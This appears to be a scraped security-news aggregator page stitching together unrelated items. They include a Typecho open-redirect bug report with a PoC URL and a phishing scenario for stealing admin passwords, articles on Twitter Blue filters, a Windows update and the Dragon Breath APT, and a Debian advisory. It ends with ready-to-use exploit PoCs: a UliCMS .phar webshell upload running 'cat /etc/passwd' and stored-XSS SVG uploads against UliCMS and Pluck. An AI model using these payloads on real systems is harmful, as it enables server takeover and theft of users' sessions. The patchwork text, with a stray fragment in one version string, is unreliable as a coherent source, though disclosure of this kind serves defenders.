Open redirect vulnerability in typecho 1.1-17.10.30-release via the referer parameter to Login.php.

**1\. 该问题的重现步骤是什么？**

Typecho latest version url jump vulnerability after login  
code:

    admin > Login.php
    public function action()
    {
        // protect
        $this->security->protect();
    
        /** 如果已经登录 */
        if ($this->user->hasLogin()) {
            /** 直接返回 */
            $this->response->redirect($this->options->index);
    

Typecho first determines whether the user has logged in. If it has already logged in, it directly calls the redirect () function to redirect to the home page. This jump is mainly used to determine the user's status.  
typecho首先判断用户是否已经登录，如果已经登录，则直接调用redirect()函数重定向至首页，这个跳转主要用于判断用户的状态。

    admin > Login.php
    if (NULL != $this->request->referer) {
        $this->response->redirect($this->request->referer);
    } else if (!$this->user->pass('contributor', true)) {
        /** 不允许普通用户直接跳转后台 */
        $this->response->redirect($this->options->profileUrl);
    } else {
        $this->response->redirect($this->options->adminUrl);
    }
    

If there is no login, first verify whether the user's identity is correct, if the address of the referer is not empty, then call the redirect () function to redirect through the referer parameter, the referer parameter can be controlled  
如果没有登录，则首先校验用户的身份是否正确，如果referer的地址不为空，则调用redirect()函数通过referer的参数进行重定向，referer参数可控

Follow up: redirect () function, which defines two parameters, of which the default is not permanent redirect  
跟进：redirect()函数，该函数定义了两个参数，其中默认不为永久重定向

    // Response.php 
     public function redirect($location, $isPermanently = false)
    {
        /** Typecho_Common */
        $location = Typecho_Common::safeUrl($location);
    
        if ($isPermanently) {
            header('Location: ' . $location, false, 301);
            exit;
        } else {
            header('Location: ' . $location, false, 302);
            exit;
        }
    }
    

After the referer's address is passed to the redirect () function, it will first call Typecho\_Common> static method safeUrl () to check the url, and finally determine whether to use permanent or temporary redirection according to the status of isPermanently  
referer的地址传递到redirect()函数中以后，首先会调用Typecho\_Common > 静态方法safeUrl()对url进行检查，最后根据isPermanently的状态，判断使用永久重定向还是临时重定向

Follow up: /var/Typecho/Common.php  
跟进：/var/Typecho/Common.php

    public static function safeUrl($url)
    {
        //~ 针对location的xss过滤, 因为其特殊性无法使用removeXSS函数
        //~ fix issue 66
        $params = parse_url(str_replace(array("\r", "\n", "\t", ' '), '', $url));
    
        /** 禁止非法的协议跳转 */
        if (isset($params['scheme'])) {
            if (!in_array($params['scheme'], array('http', 'https'))) {
                return '/';
            }
        }
    
        /** 过滤解析串 */
        $params = array_map(array('Typecho_Common', '__removeUrlXss'), $params);
        return self::buildUrl($params);
    }
    

Use safe\_rl to replace string in str\_replace (), replace all characters in array () list with empty string, and then parse the address of referer by calling parse\_url () function: scheme, host, port, path, etc Array to $ params variable  
Next, determine whether the protocol name is empty. If the source address is not the URL of the http protocol and https protocol, return the "/" path directly  
safeUrl内使用str\_replace()进行字符串替换，将array()列表中的所有字符替换为空字符串，然后通过调用parse\_url()函数对referer的地址进行解析：scheme，host，port，path等返回一个数组到$params变量  
接着判断，协议名称是否为空，如果来源地址不是http协议与https协议的url则直接返回 “/”路径

    /**
     * 根据parse_url的结果重新组合url
     *
     * @access public
     * @param array $params 解析后的参数
     * @return string
     */
    public static function buildUrl($params)
    {
        return (isset($params['scheme']) ? $params['scheme'] . '://' : NULL)  // 如果已经设置了协议名称，则默认在协议后面拼接''://'，否则为空
        . (isset($params['user']) ? $params['user'] . (isset($params['pass']) ? ':' . $params['pass'] : NULL) . '@' : NULL)
        . (isset($params['host']) ? $params['host'] : NULL) // 如果已经设置了主机名，则使用host参数
        . (isset($params['port']) ? ':' . $params['port'] : NULL) // 如果已经设置了端口，则默认在端口后面拼接":"，否则为空
        . (isset($params['path']) ? $params['path'] : NULL) // 如果已经设置了路径，则使用path参数
        . (isset($params['query']) ? '?' . $params['query'] : NULL) // 如果已经设置了查询，则默认在query前拼接'？' 
        . (isset($params['fragment']) ? '#' . $params['fragment'] : NULL); 如果已经设置了分段，则默认在分段前拼接''#' 
    }
    

The formatted URLs are recombined and finally returned  
格式化以后的url进行重新组合，最后返回

    /**
     * 将url中的非法xss去掉时的数组回调过滤函数
     *
     * @access private
     * @param string $string 需要过滤的字符串
     * @return string
     */
    public static function __removeUrlXss($string)
    {
        $string = str_replace(array('%0d', '%0a'), '', strip_tags($string)); // 使用strip_tags()函数，强制过滤html代码，然后使用str_replace()函数将%0d,%0a（回车，换行）字符替换为空
        return preg_replace(array(
            "/$\s*(\"|')/i",           //函数开头
            "/(\"|')\s*$/i",           //函数结尾
        ), '', $string);
    }
    

poc:

    http://127.0.0.1/admin/login.php?referer=http://www.baidu.com
    

登录前：  
  
登录后跳转：  

response：

    HTTP/1.1 302 Found
    Date: Wed, 29 Apr 2020 07:37:06 GMT
    Server: Apache/2.4.41 (Debian)
    Set-Cookie: 122609301a375f23d5f0237df98400e5__typecho_uid=1; path=/
    Set-Cookie: 122609301a375f23d5f0237df98400e5__typecho_authCode=%24T%24VThLGyoLF07ae80963105613a00721934cce56d0a; path=/
    Location: http://www.baidu.com
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
    

**2\. 你期待的结果是什么？实际看到的又是什么？**

1.typecho首先判断用户登录状态  
2.如果已经登录则返回主页  
3.如果没有登录则先判断用户帐号密码是否正确，然后判断referer的来源是否为空  
4.如果不为空则调用redirect()函数进行重定向，location参数可控，即用户的referer的请求来源，恶意的攻击者可利用登录后的重定向将用户引诱至一个恶意的钓鱼页面。并且可以通过注册相似域名提高信任度，只需要将注册好的域名安装typecho，将用户重定向至自己本域的登录地址，然后通过查看本地的登录日志即可获取其他管理用户的帐号密码。  
5.rediect() > Typecho\_Common::safeUrl()函数对referer的参数进行过滤及校验协议是否为http/https  
6.rediect() > self::buildUrl()函数根据parse\_url的结果重新组合url  
7.redirect()根据isPermanently参数进行301/302跳转

修复方案：  
1.校验用户登录以后的referer地址为本域  
2.并且只允许本域内进行跳转

**3\. 问题出现的环境**

*   操作系统版本：Linux kali 5.3.0-kali2-amd64 70,能整一个 todolist 么？ #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86\_64 GNU/Linux
*   Apache/NGINX 版本：Server version: Apache/2.4.41 (Debian)，Server built: 2019-08-14T04:42:29
*   数据库版本：mariadb Ver 15.1 Distrib 10.3.20-MariaDB, for debian-linux-gnu (x86\_64) using readline 5.2
*   PHP 版本：PHP 7.3.10-1+b1 (cli) (built: Oct 13 2019 23:50:57) ( NTS )  
    Copyright (c) 1997-2018 The PHP Group  
    Zend Engine v3.3.10, Copyright (c) 1998-2018 Zend Technologies  
    with Zend OPcache v7.3.10-1+b1, Copyright (c) 1999-2018, by Zend Technologies
*   Typecho 版本：1.1-17.10.30-release
*   浏览器版本：Chromium 81.0.4044.92 built on Debian bullseye/sid, running on Debian kali-rolling  
    \[//\]: # (如有图片请附上截图)

CVE-2020-21038: typecho登录后的url重定向漏洞 | Typecho latest version url jump vulnerability after login · Issue #952 · typecho/typecho

A  few simple tools can help filter out most Twitter Blue users (but still see the ones you like).

I'm not here to judge anyone who pays for Twitter Blue. However, I'm not a fan of pay-to-win mechanics. At this point, Twitter is a game where players compete for the most attention; Twitter Blue is overpowered DLC. If you buy a subscription, your tweets are shown at the top of comment threads and prioritized in other contexts, including the “For You” page. This makes Blue the social media equivalent of paying for unlimited ammo or improved body armor, regardless of who you are or whether what you have to say is worth promoting.

It also makes Twitter really annoying to use. No one wants to play with the people who are paying to win. That's why there's so much mockery of, and desire to avoid, Twitter Blue users.

Granted, there are plenty of reasons why longtime Twitter power users—in particular, public figures or people who historically have trouble with impersonators—might pay for Twitter Blue. No one wants to lose an audience they worked hard to build, and Twitter has the right to monetize itself however it likes. You also have the right to consume (or not consume) the social media you choose.

All the same, it can't be denied that a lot of really annoying posts from Twitter Blue users with low follower counts show up in all kinds of contexts. If you don't want to see those posts, I don't blame you, and here's how you can filter them all out:

Blue Lite Blocker

Twitter via Justin Pot

BlueLiteBlocker is a free, open-source browser extension for Chrome and Firefox that can filter comments from Twitter Blue subscribers out of your Twitter timeline. You can install the extension and then use Twitter the way you normally do. All comments from Twitter Blue users will be obscured—you can click “View” if you are absolutely certain you want to see them.

Unlike some extensions (BluesBlocker, for example, or Twitter Blue Blocker), Blue Lite Blocker doesn't affect anyone that you actively follow, meaning it won't accidentally filter out your friends. The extension also allows you to still see the tweets from Twitter Blue users that have a certain number of followers—the default threshold is 100,000, but you can set it to whatever you want.

Twitter via Justin Pot

These two features make Blue Lite Blocker the perfect compromise. It filters out the annoying Twitter Blue users while not affecting the people you care about and the public figures whose posts you might want to see. If there's a Twitter Blue user with a lot of followers who you don't want to see, you can block or mute them manually.

Other Workarounds to Clean Up Twitter

Blue Lite Blocker isn't a perfect solution. It requires a browser extension, which not everyone is going to like, and it doesn’t help on mobile (not that there’s much help on mobile anyway). There are a few alternatives, though.

Twitter via Justin Pot

The first is to make sure you're using the Following tab instead of For You. This tab is just tweets from the people you follow, so it doesn't artificially favor Twitter Blue subscribers. You could also try blocking all retweets if you want to clean things up a little more.

If that's not enough, you could try TweetDeck, the power user's version of Twitter. This tool doesn't have a For You page or any algorithmic sorting, meaning Twitter Blue users aren't artificially boosted on it. TweetDeck is the one part of Twitter that's completely untouched by the recent changes there, and I hope this doesn't change. (So please, no one tell Elon Musk that TweetDeck still exists.)

Another cool extension, if you miss seeing legacy checkmarks, is Eight Dollars. Right now blue checkmarks only show up if someone is paying for Blue, meaning most people who had a checkmark prior to April 20, 2023 no longer have one. Eight Dollars can show you which users were verified before legacy verified checkmarks were removed, which is useful if you trusted the old system.

There's a cat and mouse element to all of this, of course. Twitter's current regime really, really wants to turn Blue checkmarks into sellable status symbols and any tool that diminishes the visibility of Blue subscribers cuts against that goal. They're going to try to find a way to break this, and all similar, tools. For now, though, they work—use them while you can. 

Or you could just abandon your Twitter account, set up a public archive of your tweets, and learn how to get started on Mastodon or Bluesky. Up to you.

Your Twitter Feed Sucks Now. These Free Add-Ons Can Help

Categories: News
Tags: Chrome

Tags:  Windows

Tags:  Edge

Tags:  browser

Tags:  update

Tags:  Microsoft

Tags:  default

Tags:  install

We take a look at trouble brewing in browser land after a controversial Windows update leaves Chrome fans without a useful feature.



(Read more...)




The post Microsoft vs Google spat sees users rolling back security updates to fix browser issues appeared first on Malwarebytes Labs.

We like to imagine we’re in total control of our desktop experience, carefully curated to look and work the way we want it to. However, every so often a story comes along which reminds us how little control we have when the big players notice one another's existence. A recent Windows update really wants you to use Edge instead of rival browsers, to the extent that some features in those rival browsers are breaking.

A lot of people will only ever use Microsoft's default Edge browser to download another browser they'd rather use. Last year, Chrome made some changes to how you go about making it your default browser, after you've downloaded it with Edge. One "Default" button to press, and boom…your default browser is set to Chrome without having to dig around in your system settings.

This is how things should work, and for a while they did! As Gizmodo notes, this was not to be the case for long.

Microsoft released update KB5025221 last month, and users of Chrome quickly began to flag peculiar experiences. From a Reddit user:

> If Chrome is set as the default browser, clicking on the link shortcut will open the link in chrome, but also open the Windows settings on the default apps. Anyone know where this behaviour comes from? It doesn't happen if we change the default browser to Edge.

Elsewhere, we have a thread about how someone’s 600 business devices all exhibit the same behaviour:

> Opening chrome causes default app settings to open each and every time. After today's cumulative update for Windows 10 and 11, 2023-04, every time I open Chrome the default app settings of windows will open. I've tried many ways to resolve this without luck. This is happening to all 600 systems with the update. Removing the update makes the issue go away. Anyone else having this issue? This does not occur when opening edge or brave browser, only Chrome for us.

A quick glance at the replies illustrates that Todd isn’t the only one impacted, as well as presenting the solution:

> Good morning Todd, We're having the same issue through our organization as well. We're on Windows 10 machines and pushed updates the last couple days. Many machines here seeing the issue. We may have just found a fix. Remove the Security Update KB5025221 and restart, this removes the problem. Looks to have fixed several machines just these last few minutes. May need to block KB5025221 until it's reissued.

Yes, to prevent this behaviour you had to make a decision on removing cumulative security updates. What did KB5025221 offer users? That would be fixes for no fewer than “ten issues that could lead to crashes, compatibility problems, and bugs in the operating system”. Would people really want to gamble by removing such a thing in order to prevent the aggravating system popups when opening Chrome?

It seems not, looking at the various replies to threads on this posted to Reddit and elsewhere. Informing users of the reason for the popups was the more sensible course of action on display. Even so, the mere possibility of people considering removing security updates to fix browser wars (intentional or otherwise) is a terrible position to find yourself in. Even without having to decide what to keep or remove because competing programs on your desktop may be having a fist fight, there are other aspects at play.

Way back in 2004, adware giants Direct Revenue went head to head in a court of law with ad company Avenue Media. The spectacularly named article “Adware cannibals feast on each other” describes how adware vendors thirsty for profit battled for desktop supremacy. The infamous Direct Revenue was accused of detecting the presence of rivals and attempting to uninstall them from PCs. This involved killing a competitor’s program and deleting registry entries to prevent it coming back to life. Indeed, from the Direct Revenue user agreement:

> You further understand and agree, by installing the software, that the software may, without any further prior notice to you, remove, disable or render inoperative other adware programs resident on your computer.

Considering just one Direct Revenue product like Aurora could make a system keel over, the last thing you’d want is half a dozen competing products all playing whack-a-mole with registry entries and who knows what else.

This is, of course, an extreme example from a very extreme time. Aggravating system popups and browser frustrations are not on the same level. Pondering update rollbacks, however, could direct us to such a place by means of another route. It’s to everyone’s benefit if these battles _don’t_ spark the digital touch paper.

For now, Chrome’s default button has been removed as a result of this most recent Windows update. All this, on top of aggravating pop up messages, space hogging adverts, and overly complicated user actions being required just to make a decision. We’ll have to wait and see what happens next in the battle of the browsers. It’s not quite at the “whoever wins, we lose” stage but it’s hard to argue a case where any of this benefits the people using these products.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Microsoft vs Google spat sees users rolling back security updates to fix browser issues

An advanced persistent threat (APT) actor known as Dragon Breath has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism.
"The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher

Advanced Persistent Threat

An advanced persistent threat (APT) actor known as **Dragon Breath** has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism.

"The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher Gabor Szappanos said.

"The latest campaigns add a twist in which a first-stage clean application 'side'-loads a second clean application and auto-executes it. The second clean application side-loads the malicious loader DLL. After that, the malicious loader DLL executes the final payload."

Operation Dragon Breath, also tracked under the names APT-Q-27 and Golden Eye, was first documented by QiAnXin in 2020, detailing a watering hole campaign designed to trick users into downloading a trojanized Windows installer for Telegram.

A subsequent campaign detailed by the Chinese cybersecurity company in May 2022 highlighted the continued use of Telegram installers as a lure to deploy additional payloads such as gh0st RAT.

Dragon Breath is also said to be part of a larger entity called Miuuti Group, with the adversary characterized as a "Chinese-speaking" entity targeting the online gaming and gambling industries, joining the likes of other Chinese activity clusters like Dragon Castling, Dragon Dance, and Earth Berberoka.

The double-dip DLL side-loading strategy, per Sophos, has been leveraged in attacks targeting users in the Philippines, Japan, Taiwan, Singapore, Hong Kong, and China. These attempted intrusions were ultimately unsuccessful.

The initial vector is a fake website hosting an installer for Telegram that, when opened, creates a desktop shortcut that's designed to load malicious components behind the scenes upon launch, while also displaying to the victim the Telegram app user interface.

What's more, the adversary is believed to have created multiple variations of the scheme in which tampered installers for other apps, such as LetsVPN and WhatsApp, are used to initiate the attack chain.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The next stage involves the use of a second clean application as an intermediate to avoid detection and load the final payload via a malicious DLL.

The payload functions as a backdoor capable of downloading and executing files, clearing event logs, extracting and setting clipboard content, running arbitrary commands, and stealing cryptocurrency from the MetaMask wallet extension for Google Chrome.

"DLL sideloading, first identified in Windows products in 2010 but prevalent across multiple platforms, continues to be an effective and appealing tactic for threat actors," Szappanos said.

"This double-clean-app technique employed by the Dragon Breath group, targeting a user sector (online gambling) that has traditionally been less scrutinized by security researchers, represents the continued vitality of this approach."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Dragon Breath APT Group Using Double-Clean-App Technique to Target Gambling Industry

Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

CVE-2023-29354

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2023-29350

Debian Linux Security Advisory 5398-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5398-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 04, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2459 CVE-2023-2460 CVE-2023-2461 CVE-2023-2462                  CVE-2023-2463 CVE-2023-2464 CVE-2023-2465 CVE-2023-2466                  CVE-2023-2467 CVE-2023-2468Debian Bug     : 992178 1031352Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 113.0.5672.63-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRUCKIACgkQEMKTtsN8TjbOCg/7BvJxNQVuHLPhC7gcECOh0c9kCZf8bXzsLubVAsoA5t7dj/v8s9KYvXbwYzopwZcIshx5r4B0S59bfTGNEq60mjdaPDMc4seUh9Tb7ubE6CZxPCqNyuOKE72LZFpLxymyknSS/E6yxUh4CeM5jcf5F9fmtnrPXM+WiXRwMU2KiPVBuyleGEL1Om1b3tD6u67fFBoffP+VdvLdxo42GOBSiaqAVenS00wygli1qisU6i7mifQX5uc1qnImDhQ1LLajrNCdvIL3ILYpuimYzfWTqWz+UIVvTotaCk8FuxP9/LjAS2Rdk40PL8rhxS09eSpMb49WSi3rPzfGkkzwjPk/7rkCX/zB2n3gxn6m4fnOP9tjmQxSQmIot0xW1HjLT+0GIg2lHNrsRemuArLfqqgw3b3Widv6k8nC+2JN05yFEgNDnhZes9YXESMm6yGkbQXQZv6cCY6VKxPeQpXh2IWdK1K32R1I+faJmvL+mj1GAqCFzSGn0QH/vYinQ5nmvK1oh7SZuHWw2uIyqBwHVIz+D7PNjjd73kxXew8nt5WmPvziD0hsFBxsv3q/rn26QRSlcCqMkT6vdQAlI3vvYyd27njQqbkuKnIpiU1DqWkvqoaQ4dvqhf4QN1nteH75B6w+Mln1NDll/aCb4DvglNq1t7vwLrwF/1V7cvDmmTLd0zA==Mdwu-----END PGP SIGNATURE-----

Debian Security Advisory 5398-1

UliCMS version 2023-1 Sniffing-Vicuna suffers from a remote shell upload vulnerability.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs:  RCE  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Login to account and edit profile.

2.Upload new Avatar

3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

payload: <?php echo system("cat /etc/passwd"); ?>

poc request :

POST /dist/admin/index.php HTTP/1.1  
Host: localhost  
Content-Length: 1982  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv  
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sClass"

UserController  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sMethod"

update  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="avatar"; filename="salam.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="edit_admin"

edit_admin  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="id"

12  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="firstname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="lastname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="email"

account1@test.com  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password_repeat"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="group_id"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="secondary_groups[]"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="homepage"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="html_editor"

ckeditor  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="admin"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="default_language"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="about_me"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error  
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67  
Stack trace:  
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73  
Stack trace:  
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

UliCMS 2023-1 Sniffing-Vicuna Shell Upload

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Tag

#chrome